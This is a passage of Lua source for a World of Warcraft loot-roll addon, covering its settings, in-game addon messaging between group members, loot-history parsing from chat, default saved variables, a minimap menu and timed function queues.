﻿local addOn, ns = ...
local L = ns.L
_G[addOn] = ns

ns.AddOnVer = '88'
ns.downloadLink = "https://www.curseforge.com/wow/addons/loothelper"

--[==[
GameTooltip_ShowCompareItem = function(self)

	print(debugstack(2, 3, 2))
	
end
]==]

local versionStr, internalVersion, dateofpatch, uiVersion = GetBuildInfo(); internalVersion = tonumber(internalVersion)

ns.wowbuild = internalVersion
ns.uibuild	= tonumber(uiVersion)

if ns.uibuild >= 70000 then
	ns.IsLegion	= true
end

local IsAddonMessagePrefixRegistered = C_ChatInfo and C_ChatInfo.IsAddonMessagePrefixRegistered or IsAddonMessagePrefixRegistered
local SendAddonMessage = C_ChatInfo and C_ChatInfo.SendAddonMessage or SendAddonMessage
local RegisterAddonMessagePrefix = C_ChatInfo and C_ChatInfo.RegisterAddonMessagePrefix or RegisterAddonMessagePrefix

-------------------------------------------
-- Legion HookTexture
-------------------------------------------
do
	local tonumber = tonumber
	function ns.CustomSetTexture(obj, a1, a2, a3, a4)
		if ns.IsLegion then
			if ( a1 and a2 and a3 ) and ( tonumber(a1) and tonumber(a2) and tonumber(a3) ) then
				obj:SetColorTexture(a1, a2, a3, a4)
			else
				obj:SetTexture(a1, a2, a3, a4)
			end
		else
			obj:SetTexture(a1, a2, a3, a4)
		end
	end
end

-------------------------------------------
-- Debug
-------------------------------------------

ns.testMode = false
ns.relicTest = false
ns.azeriteTest = true
ns.debugUI = false
ns.showPrint1 = false -- print
ns.showPrint2 = false -- fprint
ns.showPrint3 = false -- dprint

do
	local unpack = unpack
	local type = type
	function ns.inLinePrint(...)
		local t = { ... }
		for i=1, #t do
			if t[i] and type(t[i]) == 'string' then
				t[i] = t[i]:gsub('\n', ' ')
			end
		end
		
		print(unpack(t))
	end
	
	function ns.getLinkCode(msg)
		return msg:gsub('|', 'l')
	end
end

-------------------------------------------
-- Settings
-------------------------------------------

ns.timeWaitForCheck = 2 -- время проверки отдачи вещи
ns.showLootAnonce = true
ns.shortItemLink = false

ns.groupUpSameItems = true

ns.clienRollDice = false

ns.LootRollIconTheme = {}

ns.LootRollIconTheme[1] = { "Interface\\Buttons\\UI-GroupLoot-Dice-Up", "Interface\\Buttons\\UI-GroupLoot-Dice-Highlight", "Interface\\Buttons\\UI-GroupLoot-Dice-Down" }
ns.LootRollIconTheme[2] = { "Interface\\Buttons\\UI-GroupLoot-Coin-Up", "Interface\\Buttons\\UI-GroupLoot-Coin-Highlight", "Interface\\Buttons\\UI-GroupLoot-Coin-Down" }
ns.LootRollIconTheme[3] = { "Interface\\Buttons\\UI-GroupLoot-DE-Up",   "Interface\\Buttons\\UI-GroupLoot-DE-Highlight",   "Interface\\Buttons\\UI-GroupLoot-DE-Down"   }
ns.LootRollIconTheme[4] = { "Interface\\Buttons\\UI-GroupLoot-DE-Up",   "Interface\\Buttons\\UI-GroupLoot-DE-Highlight",   "Interface\\Buttons\\UI-GroupLoot-DE-Down"   }


ns.LootRollButtons = {}
ns.LootRollButtons[1] = { name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 }
ns.LootRollButtons[2] = { name = L['OFFSPEC'],      tip = 'offspec',    arg = 'roll', icon = 1 }
ns.LootRollButtons[3] = { name = L['UPGRADE'],        tip = 'upgrade',    arg = 'roll', icon = 2 }
ns.LootRollButtons[4] = { name = L['TRANSMOG'],     tip = 'transmog',   arg = 'roll', icon = 3 }
ns.LootRollButtons[5] = { name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 }
ns.LootRollButtons[6] = { name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 }

ns.LootRollRelicButtons = {}
ns.LootRollRelicButtons[1] = { name = L['NEED'],       	tip = 'need',       arg = 'roll', icon = 1 }
ns.LootRollRelicButtons[2] = { name = L['OFFSPEC'],      tip = 'offspec',    arg = 'roll', icon = 1 }
ns.LootRollRelicButtons[3] = { name = 'ReRoll',        	tip = 'upgrade',    arg = 'roll', icon = 2 }
ns.LootRollRelicButtons[4] = { name = 'Upgrade',     	tip = 'upgrade',   arg = 'roll', icon = 3 }

ns.LootRollTokenButtons = {}
ns.LootRollTokenButtons[1] = { name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 }
ns.LootRollTokenButtons[2] = { name = L['OFFSPEC'],      tip = 'offspec',    arg = 'roll', icon = 1 }
ns.LootRollTokenButtons[3] = { name = 'ReRoll',        tip = 'upgrade',    arg = 'roll', icon = 2 }
ns.LootRollTokenButtons[4] = { name = 'TRANSMOG',     tip = 'transmog',   arg = 'roll', icon = 3 }
ns.LootRollTokenButtons[5] = { name = 'Upgrade',     tip = 'upgrade',   arg = 'roll', icon = 3 }

--ns.LootRollButtons[5] = { name = 'Dis',          tip = 'disenchant', arg = 'normal', icon = 4 }

ns.rollTypeColors = {
	['need']     = "|cFF00FF00",
	['offspec']  = "|cFF00dcff",
	['upgrade']  = '|cFFdcff00',
	['transmog'] = '|cFFf2a0d3',
	['pass']	 = '|cFFFFFFFF',
}

ns.buttonsTexture = 'Interface\\AddOns\\'..addOn..'\\media\\Minimalist.tga'

ns.default_font = 'Interface\\AddOns\\'..addOn..'\\media\\PT-Sans-Narrow-Bold.ttf' --[[Fonts\ARIALN.TTF]] --"Fonts\\FRIZQT___CYR.TTF" --STANDARD_TEXT_FONT
ns.default_font_size = 12
ns.default_font_outline = 'NONE'

ns.arrorTexture = 'Interface\\petbattles\\battlebar-abilitybadge-strong-small'

ns.ShowPass = true

ns.lootQuality = {
	[0] = false, --. Poor (gray): Broken I.W.I.N. Button
	[1] = false, --. Common (white): Archmage Vargoth's Staff
	[2] = false, --. Uncommon (green): X-52 Rocket Helmet
	[3] = true,  --. Rare / Superior (blue): Onyxia Scale Cloak
	[4] = true,  --. Epic (purple): Talisman of Ephemeral Power
	[5] = true,  --. Legendary (orange): Fragment of Val'anyr
	[6] = false, --. Artifact (golden yellow): The Twin Blades of Azzinoth
	[7] = false, --. Heirloom (light yellow): Bloodied Arcanite Reaper
	[8] = false, --. WoW time item
}

ns.subClassItemIgnore = {
	[GetSpellInfo(158716) or 'NULL'] = true,
}
ns.itemIDIgnore = {
	[124124] = true
}

ns.ITEM_LEVEL_PATTERN =  '^'..ITEM_LEVEL:gsub('%%d', '(%%d+)')

function ns.GlobalItemIgnore(link, class, subclass)
	if subclass and ns.subClassItemIgnore[subclass] then
		return true
	end
	
	if link then
		local itemID = ns.GetItemID(link)
		if itemID and ns.itemIDIgnore[itemID] then
			return true
		end
	end
	
	return false
end
-------------------------------------------
-- core.lua
-------------------------------------------

local events = CreateFrame('Frame')
events:SetScript('OnEvent', function(self, event, ...)
	self[event](self, event, ...)
end)

events:RegisterEvent('CHAT_MSG_ADDON')
events:RegisterEvent('ADDON_LOADED')
events:RegisterEvent('PLAYER_LOGIN')
events:RegisterEvent('CHAT_MSG_LOOT')

local channelNameLootRollStart = 'LHRStart'
if not IsAddonMessagePrefixRegistered(channelNameLootRollStart) then
	RegisterAddonMessagePrefix(channelNameLootRollStart)
end

local channelNameLootRollSend = 'LHRSend'
if not IsAddonMessagePrefixRegistered(channelNameLootRollSend) then
	RegisterAddonMessagePrefix(channelNameLootRollSend)
end

local channelNameLootRollButtons = 'LHRButtons'
if not IsAddonMessagePrefixRegistered(channelNameLootRollButtons) then
	RegisterAddonMessagePrefix(channelNameLootRollButtons)
end

local channelNameLootRollRelicButtons = 'LHRBRelic'
if not IsAddonMessagePrefixRegistered(channelNameLootRollRelicButtons) then
	RegisterAddonMessagePrefix(channelNameLootRollRelicButtons)
end

local channelNameLootRollTokenButtons = 'LHRBToken'
if not IsAddonMessagePrefixRegistered(channelNameLootRollTokenButtons) then
	RegisterAddonMessagePrefix(channelNameLootRollTokenButtons)
end

local channelNameLootRollCancel = 'LHRCancel'
if not IsAddonMessagePrefixRegistered(channelNameLootRollCancel) then
	RegisterAddonMessagePrefix(channelNameLootRollCancel)
end

local channelNameLootRollDice = 'LHRDice'
if not IsAddonMessagePrefixRegistered(channelNameLootRollDice) then
	RegisterAddonMessagePrefix(channelNameLootRollDice)
end

local channelNameLootRollAward = 'LHRAward'
if not IsAddonMessagePrefixRegistered(channelNameLootRollAward) then
	RegisterAddonMessagePrefix(channelNameLootRollAward)
end

local channelNameLootChangeRoll = 'LHRChange'
if not IsAddonMessagePrefixRegistered(channelNameLootChangeRoll) then
	RegisterAddonMessagePrefix(channelNameLootChangeRoll)
end

local channelNameLootCheck = 'LHRCheck'
if not IsAddonMessagePrefixRegistered(channelNameLootCheck) then
	RegisterAddonMessagePrefix(channelNameLootCheck)
end

local channelNameLockOut = 'LHRLock'
if not IsAddonMessagePrefixRegistered(channelNameLockOut) then
	RegisterAddonMessagePrefix(channelNameLockOut)
end

local channelNameLockOutR = 'LHRLockR'
if not IsAddonMessagePrefixRegistered(channelNameLockOutR) then
	RegisterAddonMessagePrefix(channelNameLockOutR)
end

local channelNameNoteChange = 'LHNoCh'
if not IsAddonMessagePrefixRegistered(channelNameNoteChange) then
	RegisterAddonMessagePrefix(channelNameNoteChange)
end

local channelNameLockReroll = 'LHLoRe'
if not IsAddonMessagePrefixRegistered(channelNameLockReroll) then
	RegisterAddonMessagePrefix(channelNameLockReroll)
end


ns.channelNameLootRollStart   = channelNameLootRollStart
ns.channelNameLootRollSend    = channelNameLootRollSend
ns.channelNameLootRollButtons = channelNameLootRollButtons
ns.channelNameLootRollRelicButtons = channelNameLootRollRelicButtons
ns.channelNameLootRollTokenButtons = channelNameLootRollTokenButtons
ns.channelNameLootRollCancel  = channelNameLootRollCancel
ns.channelNameLootRollDice    = channelNameLootRollDice
ns.channelNameLootRollAward   = channelNameLootRollAward
ns.channelNameLootChangeRoll  = channelNameLootChangeRoll
ns.channelNameLootCheck  	  = channelNameLootCheck
ns.channelNameLockOut		  = channelNameLockOut
ns.channelNameLockOutR		  = channelNameLockOutR
ns.channelNameNoteChange	  = channelNameNoteChange
ns.channelNameLockReroll	  = channelNameLockReroll


function ns.print(...)
	if not ns.testMode then return end
	if not ns.showPrint1 then return end
	if ns.debugUI then
		ns.Debug_AddMessage(...)
	else
		print(...)
	end
end

function ns.fprint(...)
	if not ns.testMode then return end
	if not ns.showPrint2 then return end
	if ns.debugUI then
		ns.Debug_AddMessage(...)
	else
		print(...)
	end
end

function ns.dprint(...)
	if not ns.showPrint3 then return end
	if ns.debugUI then
		ns.Debug_AddMessage(...)
	else
		print(...)
	end
end

function ns.ConfirmReceive()
	ns:SendMessage('CONFIRM', channelNameLootCheck)
end

function ns.ResendRequest()
	ns:SendMessage('RESEND', channelNameLootCheck)
end

local msgSendCache = {}
local msgPartTag = 'SH:%d:%d:%s'
local maxMsgLen = 225

function ns:SendMessage(msg, tag, forceChannel, target)
	local channel = nil

	if IsInGroup(LE_PARTY_CATEGORY_INSTANCE) or IsInRaid(LE_PARTY_CATEGORY_INSTANCE) then
		channel = "INSTANCE_CHAT"
	elseif IsInRaid(LE_PARTY_CATEGORY_HOME) then
		channel = "RAID"
	elseif IsInGroup(LE_PARTY_CATEGORY_HOME) then
		channel = "PARTY"
	end

	if not channel and not forceChannel then
		if ns.testMode then 
			channel = 'WHISPER'
			target = 'Тимош'
		else
	--		return 
		end
	end
	
	local msgLen = msg:len()	
	local numParts = ceil(msgLen/maxMsgLen)
	
--	print('T2', ns.inLinePrint(msg), msgLen)
	
	for i=1, numParts do
		local msg = format(msgPartTag, i, numParts, msg:sub( (maxMsgLen*i)-maxMsgLen+1, ( i == numParts and msgLen or maxMsgLen*i)))
		
		SendAddonMessage(tag, msg, forceChannel or channel, target)
	end
	
--	if forceChannel then
--		print('SendAddonMessage', tag, msg, forceChannel or channel, target)
--	end
end

function ns.SendMessageGuild(msg, tag)	
	local msgLen = msg:len()	
	local numParts = ceil(msgLen/maxMsgLen)

	for i=1, numParts do
		local msg = format(msgPartTag, i, numParts, msg:sub( (maxMsgLen*i)-maxMsgLen+1, ( i == numParts and msgLen or maxMsgLen*i)))
		
		SendAddonMessage(tag, msg, 'GUILD')
	end
end

local buildInMsg = {}
local function IsResetBeforeDone(author)
	local i = 0
	for _, _ in pairs(buildInMsg[author]) do
		i = i+1
	end
	
	return i
end

function ns:RecieveMessage(msg, author, tag)
--	if not buildInMsg[author] then
--		print('author', author)
--	end
	buildInMsg[author] = buildInMsg[author] or {}

	local part, totalParts, datas = string.match(msg, 'SH:(%d+):(%d+):(.+)')

	part = tonumber(part)
	totalParts = tonumber(totalParts)

	if part == 1 then	
	--	local num = IsResetBeforeDone(author)
	--	if num > 0 then
	--		print('Error on recieve msg', num)
	--	end
		
		wipe(buildInMsg[author])
	end

	buildInMsg[author][part] = datas

	if part == totalParts then
	--	local num = IsResetBeforeDone(author)		
		
--		print('T', author, 'curParts:', num, 'part:',part, 'totalParts:',totalParts)
		
		local cmsg = ''
		
		for i=1, #buildInMsg[author] do
			cmsg = cmsg..buildInMsg[author][i]
		end
		wipe(buildInMsg[author])

		if tag == channelNameLootRollStart then
			ns:ShowLootItems(cmsg, author)
			ns:ShowLootRollsItemsList(cmsg, author)
			
			C_Timer.After(1, ns.ConfirmReceive)
		elseif tag == channelNameLootRollSend then
			ns:ShowLootRolls(cmsg, author)
			if ns.testMode then
				for i=1, 5 do
					ns:ShowLootRolls(cmsg, i..author)
				end
				
				C_Timer.After(1, function()
					for i=6, 10 do
						ns:ShowLootRolls(cmsg, i..author)
					end
				end)
				
				C_Timer.After(2, function()
					for i=11, 16 do
						ns:ShowLootRolls(cmsg, i..author)
					end
				end)
				
				C_Timer.After(3, function()
					for i=17, 21 do
						ns:ShowLootRolls(cmsg, i..author)
					end
				end)
			end
		elseif tag == channelNameLootRollButtons then
			ns:SetNormalButtonSettings(cmsg, author)
		elseif tag == channelNameLootRollTokenButtons then
			ns:SetTokenButtonSettings(cmsg, author)
		elseif tag == channelNameLootRollRelicButtons then
			ns:SetRelicButtonSettings(cmsg, author)
		elseif tag == channelNameLootRollCancel then
			ns:HideLootItems(cmsg, author)
			ns:HideLootRollsItemsList(cmsg, author)
		elseif tag == channelNameLootRollDice then	
			ns:UpdateRollDice(cmsg, author)
		elseif tag == channelNameLootRollAward then
			ns.History_ReceiveData(cmsg, author)
			ns.LootTrading(cmsg, author)
		elseif tag == channelNameLootChangeRoll then
			if ns.IsReRollDisabled() then return end	
			ns.UpdateRollType_OnChange(cmsg, author)
		elseif tag == channelNameLootCheck then
			-- RL Status
			ns:Server_ReceiveHandler(cmsg, author)
		elseif tag == channelNameLockOut then
			ns:Client_ReceiveEncounterLockout(cmsg, author, tag)
		elseif tag == channelNameLockOutR then
			ns:Client_SendEncounterLockout(cmsg, author, tag)
	--	elseif tag == ns.channelNameRelicNewInfo then	
	--		ns.RelicSync_GetNewItemInfo(cmsg, author, tag)
		elseif tag == channelNameLockReroll then
			ns.ToggleReRollStatus(cmsg, author, tag)
		elseif tag == channelNameNoteChange then
			ns:ChangeRollNote(cmsg, author, tag)
		elseif tag == 'LHLSN' then
			ns.LootTradingHandler(cmsg, author, tag)
		end
	end
end

function events:CHAT_MSG_ADDON(event, tag, msg, channel, author, authorShort)

	--if tag == ns.channelNameRelicNewInfo then
	--	ns:RecieveMessage(msg, author, tag)	
	--end
	
	if not ns.testMode and channel == 'GUILD' then return end
	if not ns.db.enable then return end

	if tag == channelNameLootRollStart then
		ns:EndTest()
		
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollSend then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollButtons then
		ns:EndTest()
		
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollRelicButtons then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollTokenButtons then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollCancel then	
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollDice then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootRollAward then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootChangeRoll then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLootCheck then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLockOut then
		ns:RecieveMessage(msg, author, tag)
	elseif tag == channelNameLockOutR then
		ns:RecieveMessage(msg, author, tag)		
	elseif tag == channelNameLockReroll then
		ns:RecieveMessage(msg, author, tag)		
	elseif tag == channelNameNoteChange then
		ns:RecieveMessage(msg, author, tag)	
	elseif tag == 'LHLSN' then
		ns:RecieveMessage(msg, author, tag)
	end
end
--18:46:44 CHAT_MSG_LOOT Вы получили предмет: [Перчатки морской ведьмы].    Тэваро  0 0  0 332 nil 0 false false false false
--LOOT_ITEM = "%s получает добычу: %s.";
--LOOT_ITEM_SELF = "Ваша добыча: %s.";


local CUSTOM_LOOT_ITEM = LOOT_ITEM:gsub('%%s ', ''):gsub(' %%s.', '')
local CUSTOM_LOOT_ITEM_SELF = LOOT_ITEM_SELF:gsub(' %%s.', '')
local TR2 = 'Ваша добыча: |cffa335ee|Hitem:152283:5891:::::::110:65::4:3:3613:1472:3337:::|h[Цепь Порабощенного]|h|r'

function events:CHAT_MSG_LOOT(event, message, a1, a2, a3, sender, ...)
	if not ns:Server_IsInRaidInstance() then return end
	if not ns:IsPersonalLootEnabled() then return end
	
	--print('T', 'a1=', a1, 'a2=', a2, 'a3=', a3, 'sender=', sender, ...)
	
	if message:find(CUSTOM_LOOT_ITEM) then
	
		local he, server = ns:GetUnitFullName(sender, true)
		local link = message:match("(|Hitem:.-|h%[.-%]|h)")
		local id = ns.GetItemID(link)
		local bossID = ns.Cache_GetItemIDInfo(id)
		local _, class = UnitClass(sender)
		
		if ( not class ) then
			_, class = UnitClass(he)
		end
		
		--[==[
		print('T', 'a1=', a1, 'a2=', a2, 'a3=', a3, 'sender=', sender, ...)
		print('T1', he, server)
		print('T2', class)
		]==]
		
		if ( bossID ) then
			local colorLink = select(2, GetItemInfo(link))
			
			ns.History_AddLoot(he..'-'..server, colorLink, class, 'PERSONAL', nil, bossID)
		end
	elseif message:find(CUSTOM_LOOT_ITEM_SELF) then
		local me, server = ns:GetUnitFullName('player')
		local _, class = UnitClass('player')
		
		local link = message:match("(|Hitem:.-|h%[.-%]|h)")
		local id = ns.GetItemID(link)
		local bossID = ns.Cache_GetItemIDInfo(id)
		
		if ( bossID ) then
			local colorLink = select(2, GetItemInfo(link))
			
			ns.History_AddLoot(me..'-'..server, colorLink, class, 'PERSONAL', nil, bossID)
		end
	end
end

local default_settings = {
	ServerSizeMover = { 0, 0 },
	LootRollMover   = { 0, 0 },
	ClientSizeMover = { 0, 0 },
	LootListMover = { 0, 0 },
	TraderMover = {0, 0},

	enable = true,
	enableServer = true,
	showPass = true,
	ignoreUnusableItems = false,
	ShownMainFrame = true,
	RightClickToHideAllRolls = false,
	RollsOnTop = true,
	ShowItemLevel = true,
	SearchSameSession = true,
	EnableLootRollLog = true,
	AutoClearLootLog = true,
	ColoredRollFilter = true,
	AuraPassUnusableRolls = false,
	EnableTokenItemHook = false,
	EnableAwardingLoot = false,
	EnableShornLootLink = false,
	relicTooltipInfoHelp = true,
	azeriteTooltipInfoHelp = true,
	groupUpSameItems = true,
	
	enableScreenShot = false,
	
	doStartRollAnonce = true,
	canTradeFrame = true,
	
	enableAlerts = true,
	enableReRoll = true,
	
	ignorePerZoneClient = {	
		{	
			name = 'HFC',
			zoneID = 1448,
			values = {
				{ name = 'LFR',	   diff = 17, value = false, },
				{ name = 'NORMAL', diff = 14, value = true, },
				{ name = 'HEROIC', diff = 15, value = true, },
				{ name = 'MYTHIC', diff = 16, value = true, },
			},		
		},
	},
	
	ignorePerZoneServer = {		
		{	
			name = 'HFC',
			zoneID = 1448,
			values = {
				{ name = 'LFR',	   diff = 17, value = false, },
				{ name = 'NORMAL', diff = 14, value = true, },
				{ name = 'HEROIC', diff = 15, value = true, },
				{ name = 'MYTHIC', diff = 16, value = true, },
			},		
		},
	},
	
	LootRollButtonsNumButtons = 4,
	LootRollButtons = {
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['OFFSPEC'],     tip = 'offspec',    arg = 'roll', icon = 1 },
		{ name = L['UPGRADE'],     tip = 'upgrade',    arg = 'roll', icon = 2 },
		{ name = L['TRANSMOG'],    tip = 'transmog',   arg = 'roll', icon = 3 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
	},
	LootRollRelicNumButtons = 4,
	LootRollRelicButtons = {
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['OFFSPEC'],     tip = 'offspec',    arg = 'roll', icon = 1 },
		{ name = L['UPGRADE'],     tip = 'upgrade',    arg = 'roll', icon = 2 },
		{ name = L['TRANSMOG'],    tip = 'transmog',   arg = 'roll', icon = 3 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
	},
	LootRollTokenNumButtons = 4,
	LootRollTokenButtons = {
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['OFFSPEC'],     tip = 'offspec',    arg = 'roll', icon = 1 },
		{ name = L['UPGRADE'],     tip = 'upgrade',    arg = 'roll', icon = 2 },
		{ name = L['TRANSMOG'],    tip = 'transmog',   arg = 'roll', icon = 3 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
		{ name = L['NEED'],        tip = 'need',       arg = 'roll', icon = 1 },	
	},
	
	
	lootQuality = {
		[0] = false, --. Poor (gray): Broken I.W.I.N. Button
		[1] = false, --. Common (white): Archmage Vargoth's Staff
		[2] = false, --. Uncommon (green): X-52 Rocket Helmet
		[3] = true,  --. Rare / Superior (blue): Onyxia Scale Cloak
		[4] = true,  --. Epic (purple): Talisman of Ephemeral Power
		[5] = true,  --. Legendary (orange): Fragment of Val'anyr
		[6] = false, --. Artifact (golden yellow): The Twin Blades of Azzinoth
		[7] = false, --. Heirloom (light yellow): Bloodied Arcanite Reaper
	--	[8] = false, --. WoW time item
	},
	
	rollTypeColors = {
		['need']     = "|cFF00FF00",
		['offspec']  = "|cFF00dcff",
		['upgrade']  = '|cFFdcff00',
		['transmog'] = '|cFFf2a0d3',
		['pass']	 = '|cFFFFFFFF',
	},
	
	lootHistory_Date = {},
	lootHistory_Units = {},
	lootHistory_Date_Units = {},
	lootHistory_Encounter_Boss = {},
	lootHistory = {},
	
	lootFilterCache = {},
}

ns.default_settings = default_settings

local minimapButton = nil

local function GetMinimapButtonMenuList()
	local list = {}
	
	list[#list+1] = { text = NORMAL_FONT_COLOR_CODE..addOn..' v'..ns.AddOnVer..FONT_COLOR_CODE_CLOSE,  disabled = true, isTitle = true, notCheckable = true}
	list[#list+1] =	{ text = L['OPEN_SESSION'], func = function(self) ns.OpenLootRollsMainFrame()  end, notCheckable = true }
	list[#list+1] =	{ text = L['OPEN_MAINFRAME_HISTORY'], func = function(self) ns.ShowLootListFrame_Alone()  end, notCheckable = true }
	list[#list+1] =	{ text = '', disabled = true, notCheckable = true  }
	
	--if ns:IsMasterLooter() then 
		list[#list+1] =	{ text = ( ns.db.enableScreenShot and L['DISABLE_SCREENSHOTS'] or L['ENABLE_SCREENSHOTS']), func = function(self) ns.db.enableScreenShot = not ns.db.enableScreenShot end, notCheckable = true }
		list[#list+1] =	{ text = '', disabled = true, notCheckable = true }
	--end
	
	list[#list+1] =	{ text = L['CANCEL'], func = function(self) ns.HideMenu() end, notCheckable = true }

	
	return list
end

local function ShowHideUI(command, ...)
	
	if command and command == 'RightButton' then
		ns.ShowMenu(minimapButton, GetMinimapButtonMenuList()) --:SetParent(minimapButton)
		return
	end
	
	if command and command:sub(1, 7) == 'session' then
		ns.OpenLootRollsMainFrame()
		ns.HideMenu()
		return
	elseif command and command:sub(1, 6) == 'resend' then
		ns.ResendRequest()
		return
	end
	
	ns.HideMenu()
	
	if AleaUI_GUI:IsOpened(addOn) then
		AleaUI_GUI:Close(addOn)
	else
		AleaUI_GUI:Open(addOn)
	end
end

local function OnClick_MinimapButton(self, button)
	if self.OnClick then	
		self.OnClick(button)
	end
end

function events:ADDON_LOADED(event, loaded_addOn)
	if addOn ~= loaded_addOn then return end
	
	ns.db = ALEAUI_NewDB("LootHelperDB", default_settings, true)
	
	ns.db.minimap = ns.db.minimap or {}
	
	AleaUI_GUI.SlashCommand(addOn, "/loothelper", ShowHideUI)
	AleaUI_GUI.MinimapButton(addOn, { OnClick = ShowHideUI, texture = "Interface\\Buttons\\UI-GroupLoot-Dice-Up" }, ns.db.minimap )
	
	minimapButton = AleaUI_GUI.GetMinimapButton(addOn)
	minimapButton:SetScript('OnClick', OnClick_MinimapButton)

	if LootHelperDB.ClientSizeMover then	
		ns.db.ClientSizeMover = LootHelperDB.ClientSizeMover
		LootHelperDB.ClientSizeMover = nil
	end
	
	if LootHelperDB.ServerSizeMover then	
		ns.db.ServerSizeMover = LootHelperDB.ServerSizeMover
		LootHelperDB.ServerSizeMover = nil
	end
	
	if LootHelperDB.LootRollMover then	
		ns.db.LootRollMover = LootHelperDB.LootRollMover
		LootHelperDB.LootRollMover = nil
	end
	
	ns:UpdateServerSizePosition()
	ns:UpdateClientSizePosition()
	ns:UpdateLootRollsSizePosition()
	ns:UpdateLootListSizePosition()
	
	ns:UpdateNormalButtonListTable()
	ns:UpdateRelicButtonListTable()
	ns:UpdateTokenButtonListTable()
end

function events:PLAYER_LOGIN()
	if ns.db.AutoClearLootLog then
		ns.History_AutoClear()
	end
	
	ns.BuildClassItemFilter()
	ns.Cache_InitUpdateLocale()
	
--	GameTooltip:HookScript("OnTooltipSetItem", ns.GameTooltip_OnTooltipSetItem)
	GameTooltip:HookScript("OnShow", ns.GameTooltip_OnTooltipSetItem)
	GameTooltip:HookScript("OnHide", ns.HideRelicInfoFrame)
end

do
	local unpack = unpack
	local GetItemInfo = GetItemInfo
	local tremove = table.remove
	
	local queueforItems = {}
	local handler = CreateFrame("Frame")
	handler:RegisterEvent('GET_ITEM_INFO_RECEIVED')
	
	local function CheckForItemGained(self, event, itemID)
	
		local index = 1
	
		while queueforItems[index] do
			local d = queueforItems[index]
			local checkItem = GetItemInfo(d.link)
			if checkItem then
				ns.print('RecieveItems', d.link)
				ns[d.func](d.link, unpack(d.args))
				tremove(queueforItems, index)
			else
				index = index + 1
			end
		end
		
		--[==[
		for i=1, #queueforItems do
			local d = queueforItems[i]
			local checkItem = GetItemInfo(d.link)		
			if checkItem then					
				ns.print('RecieveItems', d.link)
				ns[d.func](d.link, unpack(d.args))
				tremove(queueforItems, i)
				CheckForItemGained()
				break
			end
		end
		]==]
	end	
	handler:SetScript('OnEvent', CheckForItemGained)

	function ns.QueueForItemInfo(link, func, ...)
		local checkItem = GetItemInfo(link)
		
		if not checkItem then
			queueforItems[#queueforItems+1] = { 
				link = link, 
				func = func, 
				args = { ... } 
			}
		else
			ns[func](link, ...)
		end
	end
	
--	QueueForItemInfo = ns.QueueForItemInfo
end

do
	local unpack = unpack
	local tremove = table.remove
	local GetTime = GetTime
	
	local amountIndex = 0
	
	local queueforDelays = {}
	local handler = CreateFrame("Frame")
		handler:Hide()
		
	local function CheckForQueue(timer)	
		
		local index = 1
		
		while queueforDelays[index] do
			local d = queueforDelays[index]

			if d.endTime < timer then
				if type(d.func) == 'function' then
					d.func(unpack(d.args))
				elseif ns[d.func] then
					ns[d.func](unpack(d.args))
				end
			
				tremove(queueforDelays, index)
			else
				index = index + 1
			end
		end
		--[==[
		for i=1, #queueforDelays do
			local d = queueforDelays[i]	
			
			if d.endTime < timer then
			
				if type(d.func) == 'function' then
					d.func(unpack(d.args))
				elseif ns[d.func] then
					ns[d.func](unpack(d.args))
				end
			
				tremove(queueforDelays, i)
				CheckForQueue(timer)			
				break
			end
		end
		]==]
	end	
	
	local function CheckForQueueByName(name)	
	
		local index = 1
		
		while queueforDelays[index] do
			local d = queueforDelays[index]	
			
			if d.func == name then
				tremove(queueforDelays, index)
			else
				index = index + 1;
			end	
		end
		
		--[==[
		for i=1, #queueforDelays do
			local d = queueforDelays[i]	
			
			if d.func == name then		
				tremove(queueforDelays, i)
				CheckForQueueByName(name)			
				break
			end
		end	
		]==]
	end
	
	handler:SetScript('OnUpdate', function(self, elapsed)
		self.elapsed = (self.elapsed or 0) + elapsed
		
		if self.elapsed < 0.1 then return end
		self.elapsed = 0
		
		if #queueforDelays == 0 then self:Hide() end
	
		CheckForQueue(GetTime())
	end)
	
	function ns.QueueFunction(timer, func, ...)
		local index = #queueforDelays+1
		amountIndex = amountIndex + 1
		
		queueforDelays[index] = { 
			endTime = ( GetTime() + timer ),
			amountIndex = amountIndex,
			func = func, 
			args = { ... } 
		}
		
		handler.elapsed = 0
		handler:Show()
		
		return amountIndex
	end
